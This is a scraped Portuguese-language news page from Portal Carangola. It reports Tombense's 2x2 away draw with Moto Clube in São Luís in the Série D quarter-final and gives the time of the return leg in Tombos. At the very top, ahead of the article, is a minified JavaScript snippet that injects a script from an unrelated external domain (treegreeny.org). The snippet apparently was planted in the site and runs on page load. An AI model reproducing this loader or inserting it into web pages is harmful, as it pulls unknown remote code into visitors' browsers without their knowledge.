;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense empata jogo de ida no Estadio Castelão em São Luiz do Maranhão e decide a classificação em casa. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense empata jogo de ida no Estadio Castelão em São Luiz do Maranhão e decide a classificação em casa.

O Tombense conquistou mais um belo resultado jogando fora de casa , na primeira partida das quartas de final do Campeonato Brasileiro da Série D. Jogando na tarde deste domingo (12) no estádio Castelão em São Luís, a equipe Alve Rubro empatou com o Moto Clube pelo placar de 2×2.
Os gols da partida foram marcados por Diego Renan aos 7 minutos do primeiro tempo e Fabiano aos 16 minutos do segundo tempo para a equipe do Moto Club, enquanto Elvis aos 19 e Coutinho aos 22 minutos do segundo tempo marcaram para a equipe do Tombense-MG.
O próximo confronto entre as duas equipes acontece no próximo domingo (19) as 17:00 no estádio Almeidão em Tombos-MG . Com a mão na vaga para a serie C do Campeonato Brasileiro de 2015 , o Tombense jogo pelo seguintes resultados : 0 a 0 , 1 a 1 , ou um vitória simples.

Fonte: federação mineira de futebol